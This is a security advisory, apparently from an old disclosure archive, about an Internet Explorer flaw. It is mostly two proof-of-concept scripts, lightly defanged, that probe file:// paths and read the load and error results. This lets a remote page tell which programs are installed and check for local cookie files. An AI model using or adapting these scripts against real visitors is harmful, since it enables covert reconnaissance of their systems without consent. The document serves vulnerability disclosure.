|
|
|
|
| |
| A security vulnerability in the Internet Explorer product allows remote sites to enumerate which programs are currently installed on the user's computer by asking to access them via a file:// request and monitoring the returned error code. |
| |
Credit:
The information has been provided by dzzie.
|
| |
Exploit:
(note: all occurrences of 'i' were replaced with '!')
Example 1:
<!frame src=about:blank id="ifrm" height=1 width=1></iframe>
<scr!pt>
if(!document.all){alert('Ughh this is IE5+ specific')}
head='<TABLE align=center border=1 borderColor=#333333 cellPadding=0 cellSpacing=0 width="95%"><TBODY>'
htmldat='<TR bgColor=white><TD height=3 bgcolor="cccccc" width="60%">'+
'<div align=left><font size=+2 color="ffffff" face="Verdana, Arial,Helvetica, sans-serif"><b>-' +
'</b></font></div></TD><TD height=3 width=40% align=center>--</TD></TR>'
tail='</TBODY></TABLE><br><br><iframe src="disclaimer.txt" height=500 width="100%"></iframe>'
function yup(x) { img[x]+=',<img src="y.jpg">' }
function nope(x) { img[x]+=',<img src="x.jpg">' }
img=new Array
img[1]="LogicTech Cam,C:\\Program Files\\Logitech\\QuickCam\\Samples\\Henry.jpg"
img[2]="Icq,C:\\Program Files\\ICQ\\Help\\HelpCards\\images\\bg.gif"
img[3]="Interdev,C:\\Program Files\\Microsoft Visual Studio\\VIntDev98\\Samples\\Gallery\\content\\images\\CLOUDS.JPG"
img[4]="VisualC,C:\\Program Files\\Microsoft Visual Studio\\VC98\\MFC\\Include\\Res\\TRUETYPE.BMP"
img[5]="WinAce,C:\\Program Files\\WinAce\\html\\images\\tip1.gif"
img[6]="Acrobat Reader4,C:\\Program Files\\Adobe\\Acrobat 4.0\\Reader\\plug_ins\\WEBBUY\\HTML\\table_btm.gif"
img[7]="Adobe PageMaker,C:\\Program Files\\Adobe\\PM65\\RSRC\\USENGLSH\\PLUGINS\\HTMLEXP.GIF"
img[8]="MS Office,C:\\Program Files\\Microsoft Office\\Office\\Bitmaps\\Dbwiz\\BOOKS.GIF"
img[9]="Delphi6,C:\\Program Files\\Borland\\Delphi6\\BORLAND.GIF"
img[10]="Visual Basic 6,C:\\Program Files\\Microsoft Visual Studio\\VB98\\Wizards\\PDWizard\\Setup1\\INSTALL.BMP"
img[11]="IIS,C:\\Inetpub\\iissamples\\sdk\\asp\\components\\ie.gif"
n=1
function cycle(){
if(n < img.length){
dat=img[n].split(",")
img[n]=dat[0]
it = "<img src='file://" + dat[1]+ "' onload=\"parent.yup("+ n + ")\" onerror=\"parent.nope(" + n + ")\">"
ifrm.document.write(it)
document.all.timer.innerText = img.length -n
n=n+1
setTimeout("cycle();",1000)
}else{
tbl=' '
for(i=1;i<img.length;i++){
tmp=img[i].split(",")
tbl+=htmldat.split("--").join(tmp[1]).split("-").join(tmp[0])
}
document.write(head+tbl+tail)
}
}
cycle()
</script>
Example 2:
<!frame src=about:blank id="ifrm" height=1 width=1></iframe>
<scr!pt>
if(!document.all){alert('Ughh this is IE5+ specific')}
head='<TABLE align=center border=1 borderColor=#333333 cellPadding=0 cellSpacing=0 width="95%"><TBODY>'
htmldat='<TR bgColor=white><TD height=3 bgcolor="cccccc" width="60%">'+
'<div align=left><font size=+2 color="ffffff" face="Verdana, Arial,Helvetica, sans-serif"><b>-' +
'</b></font></div></TD><TD height=3 width=40% align=center>--</TD></TR>'
tail='</TBODY></TABLE><br><br><iframe src="disclaimer.txt" height=500 width="100%"></iframe>'
function yup(x) { img[x]+=',<img src="y.jpg">' }
function nope(x) { img[x]+=',<img src="x.jpg">' }
function test() { alert('hey there'+n) }
img=new Array
img[1]="Norton Anti V NT,C:\\Program Files\\Navnt\\end-user.txt"
img[2]="Norton AntiV 98,C:\\Program Files\\Norton AntiVirus\\end-user.txt"
img[3]="CygWin,C:\\cygwin\\usr\\doc\\lynx\\test\\README.txt"
img[4]="NT-Admin(google cookie),C:\\Documents and Settings\\Administrator\\Cookies\\administrator@google[1].txt"
img[5]="NT-Admin(hotmail cookie),c:\\Documents and Settings\\Administrator\\Cookies\\administrator@hotmail.msn[1].txt"
img[6]="Real Player,C:\\Program Files\\RealPlayer\\channels.xml"
img[7]="Eudora 3.x,C:\\Eudora\\Readme.txt"
img[8]="Masm,C:\\masm32\\LICENCE\\SDK_EULA.TXT"
img[9]="Php,C:\\PHP\\install.txt"
img[10]="Perl,C:\\Perl\\html\\EULA-Community_License.txt"
n=1
function cycle(){
if(n < img.length){
dat=img[n].split(",")
img[n]=dat[0]
it = "<iframe src='file://" + dat[1]+ "' onload=\"parent.yup("+ n + ")\">" //onerror='test()'>"
ifrm.document.write(it)
document.all.timer.innerText = img.length -n
n=n+1
setTimeout("cycle();",1000)
}else{
tbl=' '
for(i=1;i<img.length;i++){
if(img[i].indexOf('src=') < 1){ nope(i) }
tmp=img[i].split(",")
tbl+=htmldat.split("--").join(tmp[1]).split("-").join(tmp[0])
}
document.write(head+tbl+tail)
}
}
cycle()
</script>
|
|
|
|
|
